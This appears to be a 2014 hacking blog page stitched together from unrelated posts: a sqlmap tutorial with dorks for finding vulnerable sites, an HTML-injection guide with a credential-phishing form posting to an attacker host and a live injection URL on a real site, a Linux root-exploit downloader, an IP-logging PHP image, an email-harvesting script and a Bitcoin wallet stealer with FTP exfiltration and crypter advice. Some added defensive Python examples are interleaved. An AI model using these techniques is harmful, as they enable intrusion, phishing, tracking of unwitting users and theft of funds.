Wednesday 12 November 2014

Hack website using sqlmap | Kali Linux - BackTrack

In this tutorial I am going to show you how to hack a website with sqlmap on Kali Linux.

Introduction
[*]Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.

Step 1
[*]Find an SQL-vulnerable site.
I will give you some dorks which may help you find websites vulnerable to SQL injection.

Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=

Step 2
[*]Test if the website is vulnerable
To test whether the website is vulnerable to SQLi, just add a single quote ( ' ) at the end of the URL, as in the image below:



Then press Enter. If an error appears like the one in the image below, it means the website is vulnerable.




(I'm not going to explain advanced ways to check the website for SQL vulnerabilities because there are plenty of tutorials about that on CHF)

Ok, so we found the target. Now let's go ahead.

Step 3
[*]Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtarget.com/page.php?id=1" --dbs
(Insert the url that we checked for Sql Vulnerability)




Now we will get the database name of the website.




We got two databases, ohridhot_ohrid and information_schema. We will select the ohridhot_ohrid database.

Let's get the tables of that database.
For that we need to enter this command on terminal and after that hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables
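
Why the single-quote test in Step 2 produces a database error, and the code change that makes both that test and automated injection ineffective. This is an added example, not part of the original post; it uses Python's built-in sqlite3 with a constructed `pages` table standing in for the database behind `page.php?id=`, and all function names are assumptions.

```python
import re
import sqlite3

def make_db():
    # Constructed sample rows standing in for the table behind page.php?id=
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(1, "Home"), (2, "Members only")])
    return db

def get_page_vulnerable(db, page_id):
    # String concatenation: the request parameter becomes part of the SQL text.
    sql = "SELECT title FROM pages WHERE id = " + page_id
    return [row[0] for row in db.execute(sql)]

def get_page_safe(db, page_id):
    # 1) Accept only a short run of ASCII digits.
    # 2) Bind the value with a placeholder so it is never parsed as SQL.
    if not re.fullmatch(r"[0-9]{1,9}", page_id):
        return []
    sql = "SELECT title FROM pages WHERE id = ?"
    return [row[0] for row in db.execute(sql, (int(page_id),))]

def probe(handler, db, page_id):
    """Return ('ok', rows) or ('sql-error', msg), like a page that shows DB errors."""
    try:
        return ("ok", handler(db, page_id))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'", "1 OR 1=1"):
        print(repr(value),
              probe(get_page_vulnerable, db, value),
              probe(get_page_safe, db, value))
```

With the concatenated query the quote breaks the statement and the error reaches the client; with validation plus a bound parameter the same input is just a value that matches no row.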


HTML INJECTION

[0x01] HTML Injection:
Hypertext Markup Language (HTML) injection, also known as "virtual defacement", is an attack on an application in which the user is allowed to inject HTML code into the web application through user input fields. When the web application is not able to properly handle requests from users, an attacker can supply his own valid HTML code via a parameter value and get the application to validate the request to the server. Sometimes HTML injection is also referred to as XSS HTML injection because the two attacks are essentially the same thing, but with an XSS attack you are sending JavaScript and script tags as the attack vector, whereas in HTML injection you are using simple HTML tags to modify the page.


[0x02] Just Defacing?
Okay, so in the hacker community many people underestimate the true danger of HTML injection. Attackers also don't leverage the attack to its full potential, and just edit the content of a page to say "I hacked you!". No, defacing is just the tip of the iceberg here. HTML injection can lead to malicious pages being created that may contain a hidden Java drive-by, phishing, distributed DDoS attacks that are Java-based and run through the browser, distributed cracking attacks that go on through your browser as you're browsing the malicious site, cross-site scripting, hidden browser exploits, BeEF networks, hidden malware, bitcoin mining, and much more. These are just some of the things that attackers never even think about doing because most are just unaware of how dangerous this attack can be. Scenario of this attack being leveraged correctly:

[*] Attacker finds HTML Injection Vulnerability on Social Network Site.
[*] Attacker crafts malicious link & encodes it, containing his HTML code, and sends it to users.
[*] User visits page, due to the domain being trusted.
[*] User visits the encoded link unaware; the link redirects to a login page (a phishing page that was crafted by the attacker).
[*] User enters credentials and attacker grabs login info.
[*] Attacker now has potential to nab thousands of logins, sell to spammers, use passwords as word lists for effective cracking, and get a lot of rep.


[0x03] The Attack:

Vulnerable Application Code:
Code:
<?php
    $username = $_REQUEST ['username'];
?>
<html>
<title>member search</title>
    <h1>Welcome to CHF!</h1>
    <br>
    <body>
            Searching For <?php echo $username; ?>!
        </body>
</html>

[*] Sorry for the poor code. I didn't add a user input field, but let's just imagine that there is a search box there used to enter a user name to search. So in the input field I enter "DES". The URL would look like this after I press the search button.

Code:
http://www.chf.com/membersearch.php?username=DES

[*] Let's look at our code. The page is called membersearch.php. It requests the parameter 'username', so that's why the URL has ?username=, and whatever is entered in your input field is set as the $username variable and then echoed (printed) back onto the page. So after my search for DES, the page should say Searching for DES!. This is good: it means that whatever is entered into our input field and set as the $username variable is printed onto the page. So how about trying to enter HTML code after our ?username= and see if the server validates it.

Code:
http://www.chf.com/membersearch.php?username=<br><br><b>Hacked by DES</b>

[*] This will start two new lines, and our page will now show the injected text in bold letters:
Code:
Searching for

Hacked by DES!


[0x04] Phishing Example:
Say, in the above example, I wanted to phish accounts. Well, I would have to craft a link that will render the injected HTML, present a login form, and then comment out the rest of the page after the injection point with a <!-- to make it look a bit legit.

Code:
http://www.chf.com/membersearch.php?username=<h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST"
action="http://DES-phish.com/login.txt">Username: <input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--

[*] So now I encode this link, shorten it and then send it around the forum or web page to users. Then when user names and passwords are submitted to my phishing link, the values are sent to http://DES-phish.com/login.txt via POST and logged.
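
The defence against both the defacement in 0x03 and the phishing form in 0x04 is to HTML-encode the value where it is printed. The following is an added example, not from the original post: a Python stand-in for membersearch.php that renders the page with and without output encoding and then parses the result to list injected elements and any form that posts to another host. `SITE_HOST`, the function names and the shortened payload strings are assumptions.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.chf.com"  # host used in the page's example URLs
TEMPLATE = "<html><body>Searching For {name}!</body></html>"

def render_vulnerable(username):
    # Same behaviour as `echo $username`: the value becomes markup.
    return TEMPLATE.format(name=username)

def render_safe(username):
    # Output encoding: < > & " ' become entities, so the value stays text.
    return TEMPLATE.format(name=escape(username, quote=True))

class _Audit(HTMLParser):
    """Collects element names and the hosts of forms that post off-site."""
    def __init__(self):
        super().__init__()
        self.tags = []
        self.offsite_forms = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "form":
            host = urlparse(dict(attrs).get("action") or "").netloc
            if host and host.lower() != SITE_HOST:
                self.offsite_forms.append(host)

def audit(html_text):
    parser = _Audit()
    parser.feed(html_text)
    parser.close()
    return parser

# Constructed inputs shaped like the two examples in the post.
BOLD = "<br><br><b>Hacked by DES</b>"
FORM = ('<h3>Please log in</h3>'
        '<form method="POST" action="http://DES-phish.com/login.txt">'
        '<input type="password" name="password" /></form><!--')

if __name__ == "__main__":
    for payload in (BOLD, FORM):
        for render in (render_vulnerable, render_safe):
            report = audit(render(payload))
            print(render.__name__, report.tags, report.offsite_forms)
```

In the PHP original the equivalent change is to print `htmlspecialchars($username, ENT_QUOTES, 'UTF-8')` instead of the raw variable.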



[0x05] Persistent and NON Persistent:
Just like XSS, HTML injection can be persistent or non-persistent, with persistent HTML injection being very rare. Persistent HTML injection is achieved the same way persistent XSS is: by being able to submit your malicious code into the web page itself rather than it just being carried in a link. This can be possible in many guest books, or in places where you can leave a comment on a post or whatever. Just make sure that the page is vulnerable, and send your malicious HTML code as a comment or post. Then all people have to do is visit the link, and you can phish more effectively or have users see your deface or whatever you use this attack for.


[0x06] Live Example:
HTML injection on the National Geophysical Data Center. Even large sites are vulnerable to this attack. (Also vulnerable to XSS and SQLi on the same parameter.)

Code:
http://www.ngdc.noaa.gov/hazard/quiz/jsp/quiz/kq.jsp?htype=<b>DES@CHF</b>


[0x07] Conclusion:
Hope you guys enjoyed this. Especially you d3v0id, pretty much wrote it for you as well as for others to learn. Read on, keep learning, and I will be providing more tutorials :>

PDF,DOC Office Exploits For Virus Lovers

Some Office Exploits for Virus Lovers



First download Python 2.7, then use it.

Download Link

Klick And Root - Linux Local Root Exploiter

----------------------------------------------
KlickAndRoot - Linux Local Root Exploiter
----------------------------------------------
This is a small script to make the local exploitation process easier. The script downloads the chosen exploit from the local webserver, makes it executable and runs it.

[+] Exploit-List:

[1] nelson local priv esc (<= 2.6.37)(ED: 15704)
[2] ip_append_data() local ring0 root exploit (2.6 < 2.6.19)
[3] fs/pipe.c local kernel root(kit?) exploit (2.6.x)
[4] cups remote/local exploit (cups < 1.1.17)(use with -t 127.0.0.1)
[5] sock_sendpage() Local Root Exploit (2.4/2.6)
[8] ptrace_attach privilege escalation exploit (2.6.29)
[11] vmsplice Local Root Exploit (2.6.23 - 2.6.24)
[12] ftruncate()/open() Local Exploit (< 2.6.22)
[13] RDS privilege escalation exploit (>= 2.6.30)
[14] Mempodipper local root exploit (>=2.6.39, 32-bit and 64-bit)
[15] CAN BCM Privilege Escalation Exploit (< 2.6.36)
[16] Linux PERF_EVENTS - Local Root Exploit (= 2.6.32 - 3.8.10 x86_64)
[17] ia32syscall Emulation Local Root (< 2.6.36 x86_64)
[18] perf_swevent_init Local root Exploit (< 3.8.9 x86_64)

[+] How to use it:

[1] Copy the content of the directory webfolder to your web-root (default: /var/www)
[2] Now your web-root directory should have this structure: e.g. /var/www/KlickAndRoot/
[*] The folder KlickAndRoot contains several pre-compiled Exploits
[3] Upload the KlickAndRoot.sh -Script to the target linux machine
[4] Give executable rights to the KlickAndRoot -Script (chmod 755 KlickAndRoot.sh)
[5] Execute the script and choose an exploit
[*] Feel free to modify the script to your needs.

Cheers!

Download Link

Steal IP With Image

With this technique, you can get IP's from forum threads, forum PM's, imageboards, emails, or basically anywhere you can show an image.
You will need an Apache server, I recommend XAMPP. Otherwise you can try it on a host. However, this technique didn't work on 000webhost (a free hosting provider).

There will be two files needed on the server. One is the PHP file and the other is the gif image. The PHP file will pretend to be the image (using image/gif header), and will log the IP and other info when the image is accessed. The PHP file will log all of this in the log.html file (which it will create).

Code:

<?php
$imageurl = "http://yourwebserver.com/image.gif";
$fp = fopen('log.html', 'a');
$ip = $_SERVER['REMOTE_ADDR'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$port = $_SERVER['REMOTE_PORT'];
$file = $_SERVER['HTTP_REFERER'];
$visitTime = date("M d, h:i A");
$data =" <tr><td>$visitTime</td><td>$ip</td><td></td><td>$port";
fwrite($fp, $data);
fclose($fp);
header("content-type: image/gif");
$image = ImageCreateFromGIF($imageurl);
imagegif($image);
ImageDestroy($image);
exit();
?>


The second file will be the image. Either you can have a 1x1 blank image, or an actual image. Save it as a gif and put it in the same folder as the php file. Change the imagelink in the PHP file to point to the image.

To test if it works, create a simple html file, change the loopback to your host:

Code:

<html><body><img src="http://127.0.0.1/image.php"></body></html>



Now go check log.html. If there's a record, then it works.

To get IP's from a forum, either post the image.php as a picture on a thread, or send a PM with a message like:

Code:
http://my-ip.com/image.php



To get IP's through email is a little tricky. Most online email services won't let you attach PHP images. Also, the receiver must open the email and allow the images to be shown.
The only way I made it work was through Thunderbird.

Create a new message, and click on the attach icon on the formatting bar (not the big Attach button). You'll see options to attach a Link, anchor, image etc.
- Choose Image.
- In the link, enter something like
Code:
http://my-ip.com/image.php

- uncheck "attach this image to the message"
- select "don't use alternate text"
- click OK
- Send it, and choose send as HTML
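
From the receiving side, the technique above only works if the mail client or forum fetches remote images automatically. The following added example (not part of the original post) extracts the HTML body of a message, lists every remotely loaded image, marks those whose path does not end in an image extension (like the `image.php` URL above), and rewrites the markup so nothing is fetched until the reader opts in. The function names, the extension list and the `data-blocked-src` attribute are assumptions, and the sample message is constructed.

```python
import re
from email import message_from_string
from urllib.parse import urlparse

IMAGE_EXT = (".gif", ".png", ".jpg", ".jpeg", ".webp")
# <img ... src="http(s)://..."> with a quoted value; unquoted src is out of scope.
IMG_SRC = re.compile(
    r'(<img\b[^>]*?)(?<![\w-])src(\s*=\s*)(["\'])(https?://[^"\'>]+)\3', re.I)

def html_parts(raw_message):
    """Decoded text/html bodies of an RFC 5322 message."""
    msg = message_from_string(raw_message)
    return [part.get_payload(decode=True).decode(
                part.get_content_charset() or "utf-8", "replace")
            for part in msg.walk() if part.get_content_type() == "text/html"]

def remote_images(html_body):
    """(url, looks_like_script) for each image the client would fetch remotely."""
    found = []
    for match in IMG_SRC.finditer(html_body):
        path = urlparse(match.group(4)).path.lower()
        found.append((match.group(4), not path.endswith(IMAGE_EXT)))
    return found

def block_remote_images(html_body):
    # Rename src so no request is made until the reader chooses to load images.
    return IMG_SRC.sub(r"\1data-blocked-src\2\3\4\3", html_body)

# Constructed message; the first image URL is the one used in the post.
SAMPLE = (
    "From: a@example.org\nTo: b@example.org\nSubject: hi\n"
    "MIME-Version: 1.0\nContent-Type: text/html; charset=utf-8\n\n"
    '<p>Hello</p><img src="http://my-ip.com/image.php">'
    '<img src="https://example.org/logo.png">\n'
)

if __name__ == "__main__":
    body = html_parts(SAMPLE)[0]
    print(remote_images(body))
    print(block_remote_images(body))
```

The extension check is only a hint for triage; blocking remote loads by default is the control that stops the address from being logged.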

Collects Email Addr From Database

#!/usr/bin/python3
#Collects Email Addr From Database
#and writes them to a file.

#added dupe checking

#E x P L O i T I n c
#Ivan Ivanausqui - Joe Root
#http://www.xploit.com
#iivanausqui (at) Yahoo.com
#exploitinc (at) Yahoo.com
#8 Years old Exploit :)

import re
import sys

if len(sys.argv) != 3:
    print("\nUsage: ./dumpemail.py <database> <save file>")
    print("Example:")
    print("\t ./dumpemail.py db.sql emails.txt\n")
    sys.exit(1)

try:
    # Read the whole dump; undecodable bytes are replaced instead of aborting
    with open(sys.argv[1], "r", errors="replace") as dbfile:
        database = dbfile.read()
except IOError:
    print("\nError: Check your db path\n")
    sys.exit(1)

# A built-in set removes duplicates (the Python 2 `sets` module is gone in Python 3)
emails = sorted(set(re.findall(r'[\.\w]+@[a-zA-Z_]+?\.[a-zA-Z]{2,3}', database)))
if len(emails) >= 1:
    print("\nFound:", len(emails))
    print("Writing to file:", sys.argv[2], "\n\n")
    # Append one address per line to the output file
    with open(sys.argv[2], "a") as ofile:
        for e in emails:
            print(e)
            ofile.write(e + "\n")
else:
    print("\n[-] No email addresses found\n")
print("\n[+] Done\n")
 

Bitcoin Wallet Stealer

what tools you need for this stealer ??

1 :- Free Ftp Server
2 :- Crypter

open builder and enter you ftp server ip user pass and make virus
then fud with crypter and spread your virus on facebook google :)

Admin Email :- Hack2wwworld@yahoo.com

Download Link ===> https://dl.dropboxusercontent.com/u/95443494/Hack2World/Bitcoin%20Wallet%20Stealer.rar